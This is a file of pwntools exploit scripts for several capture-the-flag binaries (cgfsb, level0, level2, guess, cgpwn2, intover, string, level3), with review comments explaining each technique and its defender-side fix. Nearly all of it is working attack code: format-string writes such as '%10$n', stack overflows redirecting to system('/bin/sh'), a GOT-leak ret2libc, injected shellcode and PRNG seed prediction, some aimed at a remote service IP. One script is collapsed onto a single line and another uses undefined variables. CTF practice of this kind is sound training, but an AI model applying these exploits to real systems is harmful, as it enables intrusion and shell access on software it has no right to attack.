%10$n
# Exploit script for the 'cgfsb' CTF challenge binary (Python 2 syntax: `print p.recv()`).
# NOTE(review): the page shows a stray "%10$n" line and a full-width period (U+3002)
# immediately before this import; they look like extraction residue, not part of the script.
from pwn import *

# Logs every byte sent and received; handy for debugging, very noisy otherwise.
context.log_level = 'debug'

# argv[1] == 1 selects a local process, anything else the remote challenge service.
# NOTE(review): `sys` is only in scope if `from pwn import *` re-exports it -- confirm.
DEBUG = int(sys.argv[1])
if DEBUG == 1:
    p = process('./cgfsb')
else:
    p = remote('111.198.29.45',58350)

# Hard-coded address of a global in this 32-bit binary (hence p32); presumably the
# variable the challenge checks before giving the flag -- verify against the binary.
pwnme_addr = 0x0804A068
payload1 = "aaaa"
# The "message" is evidently used by the program as a printf format string (CWE-134):
# the target address is placed at the start of the buffer and "%10$n" stores the number
# of characters written so far into the pointer found at positional argument 10.
# Defender-side fix: never pass user-controlled data as the format argument
# (printf("%s", buf)); compilers also flag this with -Wformat-security.
payload2 = p32(pwnme_addr) + 'aaaa%10$n'

p.recvuntil('please tell me your name:\n')
p.sendline(payload1)
p.recvuntil('leave your message please:\n')
p.sendline(payload2)
print p.recv()
print p.recv()
# Exploit script for an unnamed 64-bit challenge (p64 is used).
# NOTE(review): `ip` and `port` are never defined in this snippet, so it cannot run as shown.
from pwn import *

p=remote(ip,port)
p.sendafter('Your Birth?',str(0)+'\n')
# 8 bytes of filler followed by the 64-bit little-endian value 1926; presumably the
# unchecked name copy overruns into an adjacent variable that is later compared against
# 1926 -- confirm against the binary. Root cause on the defender side is the missing
# length check on the name input.
p.sendafter(' Your Name?','a'*8+p64(1926))
p.interactive()
# Exploit script for a challenge binary named only by its hash-like filename (32-bit, p32).
from pwn import *

p = process("./637f5c201bf94c128c8c22e4d6e9cef3")
# 4 filler bytes, then the integer 1853186401 (== 0x6e756161) as little-endian 32-bit.
# Presumably the program's check compares an overwritten local against this constant;
# verify against the binary.
p.sendline('a'*4+p32(1853186401))
p.interactive()
# Exploit script for the 'level0' challenge (64-bit, p64): classic stack buffer overflow
# that redirects execution to an existing function in the binary.
from pwn import *

p = remote('111.198.29.45',54531)
elf = ELF("./level0")
# Address of the `callsystem` symbol read from the local copy of the binary; this only
# matches the remote service if it runs the same non-PIE build.
sysaddr = elf.symbols['callsystem']
# 0x80 bytes of buffer plus 8 bytes of saved frame pointer, then the overwritten return
# address. The offsets are hard-coded for this binary. Defender-side mitigations that
# break this pattern: bounded reads, stack canaries, PIE/ASLR.
payload = 'a'*(0x80 + 8) + p64(sysaddr)
p.recv()
p.send(payload)
p.interactive()
# Exploit script for the 'level2' challenge (32-bit, p32): return-to-`system` using a
# "/bin/sh" string already present in the binary.
from pwn import *

elf = ELF('./level2')
sys_addr = elf.symbols['system']
# `.next()` on the search generator is Python 2 only (Python 3 would need next(...)).
sh_addr = elf.search('/bin/sh').next()
# Layout after the 0x88-byte buffer and 4-byte saved ebp: system's address as the new
# return address, 0xdeadbeef as system's own (never used) return address, then the
# argument pointer. Offsets are specific to this binary.
payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)
# Remote variant kept commented out; the local process is used here.
#io = remote('111.198.29.45',40579)
io = process("./level2")
io.sendlineafter("Input:\n",payload)
io.interactive()
io.close()
# Exploit script for the 'guess' challenge: makes the program's PRNG seed known, then
# reproduces the sequence locally with the C library's rand() via ctypes.
from pwn import *
from ctypes import *

elf = ELF('./guess')
# Host libc is loaded to replay srand/rand; the sequence only matches the target if it
# uses the same rand() implementation (glibc here).
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
io = process('./guess')
#io = remote("111.198.29.45",58174)
# 32 filler bytes then the 64-bit value 1; presumably overruns the name buffer into the
# seed variable -- verify against the binary. Defender-side lesson: a seed that untrusted
# input can reach (or that is otherwise predictable) makes rand() output predictable;
# use getrandom()/arc4random-style sources for anything that must not be guessable.
payload = 32 * 'a' + p64(1)
io.sendafter("Your name:", payload)
libc.srand(1)
# Prints the ten predicted values (Python 2 print with trailing comma: no newline).
for i in range(10):
    num = str(libc.rand()%6+1)
    print num+" ",
io.interactive()
# Exploit script for the 'cgpwn2' challenge (32-bit, p32): stack overflow returning into
# `system` with a string the script itself placed in the process earlier.
from pwn import *

elf = ELF('./cgpwn2')
io = process('./cgpwn2')
#io = remote("111.198.29.45",58174)
# 42 bytes reach the saved return address (hard-coded for this binary); then `system`,
# a dummy return address, and 0x0804A080 -- presumably the global where the "name"
# answered below is stored, so it becomes system's argument. Verify against the binary.
payload = 42 * 'a' + p32(elf.symbols['system']) + p32(0xdeadbeef) + p32(0x0804A080)
shstr = "/bin/sh"
io.recvuntil("name")
io.sendline(shstr)
io.recvuntil("here:")
io.sendline(payload)
io.interactive()
# Exploit script for the 'intover' challenge (32-bit, p32).
from pwn import *

elf = ELF('./intover')
io = process('./intover')
#io = remote("111.198.29.45",51548)
io.recvuntil("choice:")
io.sendline('1')
io.recvuntil("username:")
io.sendline("aaa")
io.recvuntil("passwd")
# Total payload is 0x14 + 4 + 4 + 0xea = 262 (0x106) bytes. The challenge name and the
# odd trailing filler suggest the length check operates on a truncated (8-bit: 0x06)
# value, letting an over-long password overwrite the return address with
# `what_is_this` -- confirm against the binary. Defender-side fix: check lengths in the
# same width they are stored and compared (CWE-190/CWE-197).
io.sendline('a'*0x14 + 'a'*4 + p32(elf.symbols['what_is_this']) + 0xea*'a')
io.interactive()
from pwn import * #io = remote('111.198.29.45','41410') io = process("./string") io.recvuntil("secret[0] is ") v3_0_addr = int(io.recvuntil("\n")[:-1], 16) io.recvuntil("character's name be:") io.sendline("tiumo") io.recvuntil("east or up?:") io.sendline("east") io.recvuntil("there(1), or leave(0)?:") io.sendline("1") io.recvuntil("'Give me an address'") io.sendline(str(v3_0_addr)) io.recvuntil("you wish is:") io.sendline("%85c%7$n") context(log_level = 'debug', arch = 'amd64', os = 'linux') shellcode=asm(shellcraft.sh()) io.recvuntil("USE YOU SPELL") io.sendline(shellcode) io.interactive()
#-*-coding:utf-8-*-
# Exploit script for the 'level3' challenge (32-bit, p32): two-stage ret2libc. Stage one
# leaks the runtime address of `write` through its GOT entry; stage two reuses the same
# overflow with `system("/bin/sh")` computed from that leak. Python 2 syntax (`print`,
# `.next()`).
from pwn import *

#io = process('./level3')
io = remote('111.198.29.45',55186)
elf = ELF('./level3')
# The libc offsets below are only valid if this file matches the libc the remote uses.
libc = ELF('./libc_32.so.6')
write_plt = elf.plt['write']
vul_addr = elf.symbols['vulnerable_function']
got_addr = elf.got['write']
# Stage 1: 0x88 bytes of buffer + 4 bytes saved ebp, then return into write@plt with
# `vulnerable_function` as write's return address (so the overflow can be triggered
# again) and the arguments write(1, got_addr, 4).
payload1="a"*0x88 + 'aaaa' + p32(write_plt) + p32(vul_addr) + p32(1) + p32(got_addr) + p32(4)
io.recvuntil("Input:\n")
io.sendline(payload1)
write_addr = u32(io.recv(4))
print write_addr
libc_write = libc.symbols['write']
libc_system = libc.symbols['system']
libc_sh = libc.search('/bin/sh').next()
# Compute the real addresses from the leaked one using the relative offsets in libc.
# (Only the distance between symbols is fixed; ASLR moves the base.)
system_addr = write_addr + (libc_system-libc_write)
sh_addr = write_addr + (libc_sh-libc_write)
# Stage 2: same layout, now returning into system with a dummy return address and the
# pointer to "/bin/sh". Defender-side: the root cause is the unbounded read in
# `vulnerable_function`; full RELRO plus PIE would also remove the GOT-leak route.
payload2 = 'a'*0x88 + 'aaaa' + p32(system_addr) + 'aaaa' + p32(sh_addr)
io.recvuntil("Input:\n")
io.sendline(payload2)
io.interactive()